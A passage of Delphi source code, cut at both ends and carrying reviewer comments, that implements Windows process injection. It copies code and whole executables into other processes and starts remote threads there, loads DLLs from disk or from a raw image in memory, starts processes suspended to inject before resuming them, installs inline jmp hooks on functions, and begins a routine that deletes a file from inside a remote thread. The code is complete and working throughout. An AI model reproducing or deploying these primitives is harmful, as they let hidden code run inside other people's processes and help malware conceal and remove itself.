BytesWritten: longword;
begin
Result := VirtualAllocEx(Process, nil, Len, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(Process, Result, Memory, Len, BytesWritten);
end;
// Copies a parameter block and the code of a local procedure into Process and
// starts that code there as a new thread, with the remote copy of the block as
// its argument.
//   Process - handle to the target process
//   Thread  - local procedure whose code bytes are copied (size from SizeOfProc)
//   Info    - parameter block copied into the target
//   InfoLen - size of Info in bytes
//   Results - when True, waits for the remote thread to finish and reads the
//             parameter block back into Info
// Returns the thread handle from CreateRemoteThread (0 on failure).
// NOTE(review): when CreateRemoteThread fails (Result = 0) and Results is True,
// the wait and the read-back still run against that invalid handle.
// NOTE(review): the two regions allocated by InjectMemory are never released.
function InjectThread(Process: longword; Thread: pointer; Info: pointer; InfoLen: longword; Results: boolean): THandle;
var
RemoteInfo, RemoteCode: pointer;
ThreadId, ReadCount: longword;
begin
// Parameter block first, then the code; InjectMemory picks the addresses.
RemoteInfo := InjectMemory(Process, Info, InfoLen);
RemoteCode := InjectMemory(Process, Thread, SizeOfProc(Thread));
Result := CreateRemoteThread(Process, nil, 0, RemoteCode, RemoteInfo, 0, ThreadId);
if not Results then Exit;
// Block until the remote thread ends, then copy its parameter block back.
WaitForSingleObject(Result, INFINITE);
ReadProcessMemory(Process, RemoteInfo, Info, InfoLen, ReadCount);
end;
// Loads the DLL at ModulePath into the target process: the path is copied into
// the target and the local LoadLibraryA address is handed to a small remote
// thread (InjectLibraryThread) that calls it.
//   Process    - handle to the target process
//   ModulePath - path of the DLL to load in the target
// Returns True once the remote thread was created. The outcome of the
// LoadLibraryA call itself is never checked (InjectThread is called with
// Results = False, so nothing is read back).
// NOTE(review): pLoadLibrary is resolved in this process and used in the
// target unchanged, so this relies on kernel32 having the same base address
// in both processes - confirm.
// NOTE(review): neither the injected string nor the code/parameter memory
// allocated by InjectThread is released afterwards.
function InjectLibrary(Process: LongWord; ModulePath: string): boolean;
type
// Parameter block copied into the target; read by InjectLibraryThread.
TInjectLibraryInfo = record
pLoadLibrary: pointer; // address of kernel32 LoadLibraryA
lpModuleName: pointer; // result of InjectString (presumably the path copied into the target)
end;
var
InjectLibraryInfo: TInjectLibraryInfo;
Thread: THandle;
// Runs inside the target; its code bytes are copied there by InjectThread,
// presumably why everything it needs arrives through lpParameter.
procedure InjectLibraryThread(lpParameter: pointer); stdcall;
var
InjectLibraryInfo: TInjectLibraryInfo;
begin
InjectLibraryInfo := TInjectLibraryInfo(lpParameter^);
// Equivalent to pLoadLibrary(lpModuleName) with stdcall argument passing.
asm
push InjectLibraryInfo.lpModuleName
call InjectLibraryInfo.pLoadLibrary
end;
end;
begin
Result := False;
InjectLibraryInfo.pLoadLibrary := GetProcAddress(GetModuleHandle('kernel32'), 'LoadLibraryA');
// InjectString is not shown here; presumably copies the path into Process.
InjectLibraryInfo.lpModuleName := InjectString(Process, pchar(ModulePath));
// Results = False: the remote thread is neither waited for nor read back.
Thread := InjectThread(Process, @InjectLibraryThread, @InjectLibraryInfo, SizeOf(TInjectLibraryInfo), False);
if Thread = 0 then Exit;
CloseHandle(Thread);
Result := True;
// Presumably gives the remote thread time to run before the caller continues.
Sleep(100);
end;
// Maps an in-memory DLL image (Src points at its DOS header) into the target
// process and starts a remote thread that calls its entry point with
// DLL_PROCESS_ATTACH.
//   Process - handle to the target process
//   Src     - raw DLL image in this process's memory
// Returns True once the remote thread was created; as in the ModulePath
// overload, the entry point's own result is never checked.
// NOTE(review): unlike the ModulePath overload, the thread handle returned by
// InjectThread is never closed here.
// NOTE(review): WriteProcessMemory's result is not checked.
function InjectLibrary(Process: LongWord; Src: pointer): boolean;
type
// Parameter block copied into the target; read by DllEntryPoint.
TDllLoadInfo = record
Module: pointer;     // Lib.ImageBase (presumably equals pModule - confirm against MapLibrary)
EntryPoint: pointer; // Lib.DllProcAddress
end;
var
Lib: TLibInfo;
DllLoadInfo: TDllLoadInfo;
BytesWritten: longword;
ImageNtHeaders: PImageNtHeaders;
pModule: pointer;
Offset: longword;
// Runs inside the target: calls EntryPoint(Module, DLL_PROCESS_ATTACH, 0)
// via stdcall (arguments pushed right to left; eax is zeroed for the third).
procedure DllEntryPoint(lpParameter: pointer); stdcall;
var
LoadInfo: TDllLoadInfo;
begin
LoadInfo := TDllLoadInfo(lpParameter^);
asm
xor eax, eax
push eax
push DLL_PROCESS_ATTACH
push LoadInfo.Module
call LoadInfo.EntryPoint
end;
end;
begin
Result := False;
// NT headers sit e_lfanew bytes past the DOS header.
ImageNtHeaders := pointer(int64(cardinal(Src)) + PImageDosHeader(Src)._lfanew);
// Probe addresses above the image's preferred base in $10000 steps, from
// ImageBase + $10010000 up to ImageBase + $30000000. Each candidate is first
// reserved locally (then released) and only then requested in the target -
// presumably so the same address is free in both processes; confirm against
// MapLibrary.
Offset := $10000000;
repeat
Inc(Offset, $10000);
pModule := VirtualAlloc(pointer(ImageNtHeaders.OptionalHeader.ImageBase + Offset), ImageNtHeaders.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if pModule <> nil then
begin
VirtualFree(pModule, 0, MEM_RELEASE);
pModule := VirtualAllocEx(Process, pointer(ImageNtHeaders.OptionalHeader.ImageBase + Offset), ImageNtHeaders.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
end;
until ((pModule <> nil) or (Offset > $30000000));
// NOTE(review): if the loop ran out of range, pModule is nil here and is still
// passed to MapLibrary (not shown); the ImageBase check below is the only guard.
Lib := MapLibrary(Process, pModule, Src);
if Lib.ImageBase = nil then Exit;
DllLoadInfo.Module := Lib.ImageBase;
DllLoadInfo.EntryPoint := Lib.DllProcAddress;
// Copy the locally prepared image into the region reserved in the target.
WriteProcessMemory(Process, pModule, Lib.ImageBase, Lib.ImageSize, BytesWritten);
if InjectThread(Process, @DllEntryPoint, @DllLoadInfo, SizeOf(TDllLoadInfo), False) <> 0 then Result := True
end;
// Copies this process's own executable image into the target process and
// starts EntryPoint there with the copy's address as the thread parameter.
//   Process    - handle to the target process
//   EntryPoint - start address for the remote thread, supplied by the caller
//                and used in the target as-is
// Returns True once CreateRemoteThread succeeded; the thread handle is not
// closed.
// NOTE(review): VirtualFreeEx releases the target's region at this module's
// base, but InjectMemory allocates with a nil address, so the copy is not
// guaranteed to land at that base - confirm that EntryPoint accounts for this.
function InjectExe(Process: LongWord; EntryPoint: pointer): boolean;
var
Module, NewModule: pointer;
Size, TID: longword;
begin
Result := False;
// Base address of the running executable.
Module := pointer(GetModuleHandle(nil));
// SizeOfImage from the optional header: DOS header -> e_lfanew -> skip the
// 4-byte PE signature and the file header.
Size := PImageOptionalHeader(pointer(integer(Module) + PImageDosHeader(Module)._lfanew + SizeOf(longword) + SizeOf(TImageFileHeader))).SizeOfImage;
VirtualFreeEx(Process, Module, 0, MEM_RELEASE);
NewModule := InjectMemory(Process, Module, Size);
if CreateRemoteThread(Process, nil, 0, EntryPoint, NewModule, 0, TID) <> 0 then Result := True;
end;
// Unloads the module named by ModulePath from the target process. A remote
// thread (UninjectLibraryThread) calls FreeLibrary on the module handle
// repeatedly until GetModuleHandleA no longer finds it, then exits.
//   Process    - handle to the target process
//   ModulePath - module name/path passed to GetModuleHandleA in the target
// Returns True once the remote thread was created; whether the module was
// actually unloaded is never checked.
// NOTE(review): as in InjectLibrary, the API addresses are resolved locally
// and used in the target unchanged (same kernel32 base assumed), and the
// injected string and code/parameter memory are never freed.
function UninjectLibrary(Process: LongWord; ModulePath: string): boolean;
type
// Parameter block copied into the target; read by UninjectLibraryThread.
TUninjectLibraryInfo = record
pFreeLibrary: pointer;     // address of kernel32 FreeLibrary
pGetModuleHandle: pointer; // address of kernel32 GetModuleHandleA
lpModuleName: pointer;     // result of InjectString (presumably the name copied into the target)
pExitThread: pointer;      // address of kernel32 ExitThread
end;
var
UninjectLibraryInfo: TUninjectLibraryInfo;
Thread: THandle;
// Runs inside the target. Loop: h := GetModuleHandleA(lpModuleName);
// if h = 0 then ExitThread(0) (eax is 0 at @2) else FreeLibrary(h) and repeat.
// NOTE(review): `inc ecx` has no reader; ecx is never tested or used.
procedure UninjectLibraryThread(lpParameter: pointer); stdcall;
var
UninjectLibraryInfo: TUninjectLibraryInfo;
begin
UninjectLibraryInfo := TUninjectLibraryInfo(lpParameter^);
asm
@1:
inc ecx
push UninjectLibraryInfo.lpModuleName
call UninjectLibraryInfo.pGetModuleHandle
cmp eax, 0
je @2
push eax
call UninjectLibraryInfo.pFreeLibrary
jmp @1
@2:
push eax
call UninjectLibraryInfo.pExitThread
end;
end;
begin
Result := False;
UninjectLibraryInfo.pGetModuleHandle := GetProcAddress(GetModuleHandle('kernel32'), 'GetModuleHandleA');
UninjectLibraryInfo.pFreeLibrary := GetProcAddress(GetModuleHandle('kernel32'), 'FreeLibrary');
UninjectLibraryInfo.pExitThread := GetProcAddress(GetModuleHandle('kernel32'), 'ExitThread');
UninjectLibraryInfo.lpModuleName := InjectString(Process, pchar(ModulePath));
// Results = False: the remote thread is not waited for.
Thread := InjectThread(Process, @UninjectLibraryThread, @UninjectLibraryInfo, SizeOf(TUninjectLibraryInfo), False);
if Thread = 0 then Exit;
CloseHandle(Thread);
Result := True;
end;
// Starts a process suspended, loads the DLL at ModulePath into it via
// InjectLibrary, then resumes its main thread. All CreateProcess parameters
// are passed through unchanged except that CREATE_SUSPENDED is OR-ed into
// dwCreationFlags.
//   ModulePath - path of the DLL to load into the new process
// Returns False if CreateProcess fails, otherwise InjectLibrary's result.
// NOTE(review): the thread handle returned by the first InjectThread call is
// discarded and never closed.
// NOTE(review): MainThread loops forever calling Sleep(1000) and never
// returns; the purpose of this extra thread is not stated here - confirm
// before changing.
function CreateProcessEx(lpApplicationName: pchar; lpCommandLine: pchar; lpProcessAttributes, lpThreadAttributes: PSecurityAttributes; bInheritHandles: boolean; dwCreationFlags: longword; lpEnvironment: pointer; lpCurrentDirectory: pchar; const lpStartupInfo: TStartupInfo; var lpProcessInformation: TProcessInformation; ModulePath: string): boolean;
type
// Parameter block copied into the new process; read by MainThread.
TMainThreadInfo = record
pSleep: pointer; // address of kernel32 Sleep
end;
var
MainThreadInfo: TMainThreadInfo;
// Runs inside the new process: Sleep(1000) in an endless loop.
procedure MainThread(lpParameter: pointer); stdcall;
var
MainThreadInfo: TMainThreadInfo;
begin
MainThreadInfo := TMainThreadInfo(lpParameter^);
asm
@noret:
push 1000
call MainThreadInfo.pSleep
jmp @noret
end;
end;
begin
Result := False;
if not CreateProcess(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags or CREATE_SUSPENDED, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation) then Exit;
MainThreadInfo.pSleep := GetProcAddress(GetModuleHandle('kernel32'), 'Sleep');
// The returned remote thread handle is ignored.
InjectThread(lpProcessInformation.hProcess, @MainThread, @MainThreadInfo, SizeOf(TMainThreadInfo), False);
Result := InjectLibrary(lpProcessInformation.hProcess, ModulePath);
// Resumed regardless of whether InjectLibrary succeeded.
ResumeThread(lpProcessInformation.hThread);
end;
// Starts a process suspended, maps the in-memory DLL image at Src into it via
// InjectLibrary, then resumes its main thread. All CreateProcess parameters
// are passed through unchanged except that CREATE_SUSPENDED is OR-ed into
// dwCreationFlags.
//   Src - raw DLL image in this process's memory
// Returns False if CreateProcess fails, otherwise InjectLibrary's result.
// NOTE(review): the thread handle returned by the first InjectThread call is
// discarded and never closed.
// NOTE(review): MainThread loops forever calling Sleep(1000) and never
// returns; the purpose of this extra thread is not stated here - confirm
// before changing.
function CreateProcessEx(lpApplicationName: pchar; lpCommandLine: pchar; lpProcessAttributes, lpThreadAttributes: PSecurityAttributes; bInheritHandles: boolean; dwCreationFlags: longword; lpEnvironment: pointer; lpCurrentDirectory: pchar; const lpStartupInfo: TStartupInfo; var lpProcessInformation: TProcessInformation; Src: pointer): boolean;
type
// Parameter block copied into the new process; read by MainThread.
TMainThreadInfo = record
pSleep: pointer; // address of kernel32 Sleep
end;
var
MainThreadInfo: TMainThreadInfo;
// Runs inside the new process: Sleep(1000) in an endless loop.
procedure MainThread(lpParameter: pointer); stdcall;
var
MainThreadInfo: TMainThreadInfo;
begin
MainThreadInfo := TMainThreadInfo(lpParameter^);
asm
@noret:
push 1000
call MainThreadInfo.pSleep
jmp @noret
end;
end;
begin
Result := False;
if not CreateProcess(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags or CREATE_SUSPENDED, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation) then Exit;
MainThreadInfo.pSleep := GetProcAddress(GetModuleHandle('kernel32'), 'Sleep');
// The returned remote thread handle is ignored.
InjectThread(lpProcessInformation.hProcess, @MainThread, @MainThreadInfo, SizeOf(TMainThreadInfo), False);
Result := InjectLibrary(lpProcessInformation.hProcess, Src);
// Resumed regardless of whether InjectLibrary succeeded.
ResumeThread(lpProcessInformation.hThread);
end;
// Redirects TargetProc to NewProc by overwriting its first 5 bytes with a
// relative jmp (E9 rel32), after saving the original bytes into a heap
// buffer. OldProc receives the address of those saved bytes.
//   TargetProc - function to patch
//   NewProc    - function the jmp lands on
//   OldProc    - out: address of the saved original bytes (buffer + 5)
// Returns True on success; any exception is swallowed and yields False.
// Buffer layout (GetMem, 255 bytes), read back by UnhookCode:
//   [0..3] original TargetProc address (UnhookCode reads it at OldProc-5)
//   [4]    number of saved bytes       (UnhookCode reads it at OldProc-1)
//   [5..]  saved original bytes, written by SaveOldFunction (not shown)
// NOTE(review): all pointer arithmetic is 32-bit (longword), consistent with
// the x86 inline asm elsewhere in this unit.
// NOTE(review): the buffer comes from GetMem; whether it is executable if
// OldProc is later called depends on the process's DEP setting - confirm.
// NOTE(review): VirtualProtect's result is not checked, and SaveOldFunction
// receives no bound for the 250 bytes left in the buffer.
function HookCode(TargetProc, NewProc: pointer; var OldProc: pointer): boolean;
var
Address: longword;
OldProtect: longword;
OldFunction: pointer;
Proc: pointer;
begin
Result := False;
try
Proc := TargetProc;
// rel32 displacement: destination minus the address following the 5-byte jmp.
Address := longword(NewProc) - longword(Proc) - 5;
VirtualProtect(Proc, 5, PAGE_EXECUTE_READWRITE, OldProtect);
GetMem(OldFunction, 255);
longword(OldFunction^) := longword(Proc);
byte(pointer(longword(OldFunction) + 4)^) := SaveOldFunction(Proc, pointer(longword(OldFunction) + 5));
// Write the jmp opcode and its displacement over the start of TargetProc.
byte(pointer(Proc)^) := $e9;
longword(pointer(longword(Proc) + 1)^) := Address;
VirtualProtect(Proc, 5, OldProtect, OldProtect);
OldProc := pointer(longword(OldFunction) + 5);
except
Exit;
end;
Result := True;
end;
// Reverses HookCode: copies the saved bytes at OldProc back over the original
// function and frees the buffer.
//   OldProc - value produced by HookCode (buffer + 5)
// Returns True on success, False if any exception occurred.
// Uses the HookCode layout: original address at OldProc-5, saved byte count
// at OldProc-1, saved bytes from OldProc on.
// NOTE(review): only 5 bytes are made writable while SaveSize bytes are
// copied; VirtualProtect acts on whole pages, so this only matters if the copy
// runs past the page(s) those 5 bytes occupy - confirm SaveOldFunction's
// maximum.
// NOTE(review): VirtualProtect's result is not checked.
function UnhookCode(OldProc: pointer): boolean;
var
OldProtect: longword;
Proc: pointer;
SaveSize: longword;
begin
Result := True;
try
Proc := pointer(longword(pointer(longword(OldProc) - 5)^));
SaveSize := byte(pointer(longword(OldProc) - 1)^);
VirtualProtect(Proc, 5, PAGE_EXECUTE_READWRITE, OldProtect);
CopyMemory(Proc, OldProc, SaveSize);
VirtualProtect(Proc, 5, OldProtect, OldProtect);
// Matches the GetMem(OldFunction, 255) in HookCode.
FreeMem(pointer(longword(OldProc) - 5));
except
Result := False;
end;
end;
function DeleteFileEx(FilePath: pchar): boolean;
type
TDeleteFileExInfo = record
pSleep: pointer;
lpModuleName: pointer;
pDeleteFile: pointer;
pExitThread: pointer;
end;
var
DeleteFileExInfo: TDeleteFileExInfo;
Thread: THandle;
Process: longword;
PID: longword;
procedure DeleteFileExThread(lpParameter: pointer); stdcall;
var
DeleteFileExInfo: TDeleteFileExInfo;
begin
DeleteFileExInfo := TDeleteFileExInfo(lpParameter^);
asm
@1:
push 1000
call DeleteFileExInfo.pSleep
push DeleteFileExInfo.lpModuleName
call DeleteFileExInfo.pDeleteFile
cmp eax, 0
je @1
push eax